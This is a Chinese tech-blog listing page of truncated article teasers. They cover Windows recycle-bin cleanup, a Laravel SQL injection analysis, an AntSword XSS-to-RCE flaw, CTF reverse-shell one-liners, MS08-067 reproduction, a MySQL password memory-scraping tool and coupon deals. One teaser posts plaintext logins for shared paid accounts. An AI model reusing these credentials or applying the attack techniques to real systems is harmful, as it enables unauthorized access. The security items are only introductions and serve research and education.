文章资讯

Windows删除电脑文件会先经过回收站，目的是便于我们因意外操作而恢复电脑数据文件。只要你不是通过shift+delete组合键删除文件，也没有在回收站属性里设置不将文件移到回收站中。移除文件后立即将其删除，那么你删除的文件就会在回收站里存放很久直至手动将其清空。怎样让Windows电脑自动定期清空回收站呢微软的Windows 10操作系统附带了一项名为Storage Sense的新功能 ; 我们可以将其配置为定期自动删除回收站内容和其他临时文件。在windows 10电脑上，我们先打开Win

国内著名文字写作赚钱平台简书因用户分享翻墙相关软件、技术教程而被国家网信主管部门要求对平台上所有内容进行全面整改，整改时间2019年4月13日0时至4月19日0时。据twitter网友<a            @jvbaoillegal爆料，简书的限改令是被用户举报平台上存在大量不和谐内容导致。@jvbaoillegal在twitter上公开自己与违法翻墙斗争的记录。    最新举报成果：简书网站充

PHP知名开发框架Laravel，前几天在官方博客通报了一个高危SQL注入漏洞，这里简单分析下。首先，这个漏洞属于网站coding写法不规范，官方给了提示：但官方还是做了修补，升级最新版本V5.8.7可修复。我们先定位下这里：Illuminate\Validation\Rule官方推荐的写法是：Rule::unique('users')->ignore($id),如果网站coding没有预先对$id的值做处理时，用户可以直接传递恶意数据给ignore函数，就会导致SQL注入

4月12日凌晨，有用户在中国蚁剑GitHub上提交了issue，称发现中国蚁剑存在XSS漏洞，借此可引起RCE。据悉，该漏洞是因为在webshell远程连接失败时，中国蚁剑会返回错误信息，但因为使用的是html解析，导致xss漏洞。当通过中国蚁剑连接webshell，出现连接失败情况时，中国蚁剑会返回错误信息，如下图：而该信息并没有进行 XSS 保护，因此能够利用 js 调用 perl 便可反弹攻击者的shell。<?php header('HTTP/1.1 5

本文内容非常有助于那些参加CTF的人，因为今天我们将讨论“Windows One-Liner”，即使用PowerShell或rundll32等恶意命令来获取Windows系统的反向shell。通常，在滥用HTTP服务或其他程序时，我们会获取到RCE漏洞。 这个漏洞将允许你远程执行任意的系统命令。因此，我们准备了一个Windows命令列表，让你能够使用目标机器来获取反向连接。Mshta.exemshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Applic

最近在整理各种漏洞的利用技巧，我在Freebuf上每天都能获取很多干货，为了回馈freebuf和各位小伙伴，希望我的文章能帮到大家，希望大家能将这种分享精神发扬光大！本文仅用于安全教育和技术研究学习,切勿违法使用。一、经典漏洞复现(MS08-067)非常感谢John Lambert在几年前发表的MS08-067漏洞事件回忆录，它帮我们认识到，即使身处今天这样复杂的攻击威胁下，MS08-067漏洞事件仍然具有参考和借鉴意义。Conficker蠕虫利用了MS08-067漏洞，加入了NetBIOS感染

一个非常实用的在线截屏网站，只要输入目标网址，就能够自动生成PC电脑、苹果电脑、ipad、iphone、Android等等设备屏幕分辨率的图片。测试发现输入网址框内 填入的网址形式必须是以https://  http://开头的网址形式，否则无法生成截图。填写网址后点击Submit提交，网站会自动抓取目标网址生成截图。这个过程可能需要几秒钟的时间。比如用我的另一个网站https://www.9nw.cc/来测试，下面是生成的一张iPad, 768 x 1024的截图。一个在线截屏工具网站，

天眼查VIP会员账号共享天眼查VIP会员账号共享，剩余天数220天（北京时间2019年4月10日查询）请使用“普通登录”方式登录，请勿使用“短信登录”方式登录！共享账号，请勿修改密码！账号：17040837440密码：book5433乐视会员帐号共享账号[email protected]密码a055311芒果TV会员帐号共享 正常登陆账号[email protected]密码baoma123账号[email protected]密码baoma123迅雷会员账号共享 每日更新账号yuefu357密

我这样做只是为了好玩，用于非法目的是不允许的。mysql 客户端读取密码，然后为一些 malloc'ed 内存编写此密码，并释放它，但仅仅因为释放一个块并不意味着它将再次使用，以确保程序不会将敏感信息保留在内存中，您必须覆盖内存。主要目标是获取通过 tty 传递的密码，但有时也会从命令行 （-pxxxxxx） 传递密码。测试：mysql Ver 15.1 Distrib 10.3.13-MariaDB, for Linux&nb

微信打开搜索小程序“同程艺龙”在我的右上角点击黑鲸会员 可以看到99元开通一年赠送爱奇艺黄金会员大家有需要爱奇艺的可以上 反正等于99开爱奇艺年费会员了 怎么想都超值

平安好车主APP 100％得20元话费 亲测秒到活动跟之前发的不冲突之前的10元话费还没参加的去参加一下点击查看→平安好车主 新人注册100％得10元话费 亲测到账这次活动只要4.1以后注册的就可以参与所以跟之前发的不冲突小编两次同一个号都领取成功了玩法跟上次差不多地址选择为“辽宁鞍山”然后搜索活动中心进去下拉点击新人有礼领取车牌号随便输入如果提示需要车架号则换车牌号 直到换到需要正件号的点击“稍后”跳过领取即可活动截图到账图

免费成为饿了么会员 领取大额无门槛卷 新老用户都可以：https://tb.ele.me/wow/zele/act/svip320PS: 仅限非会员领取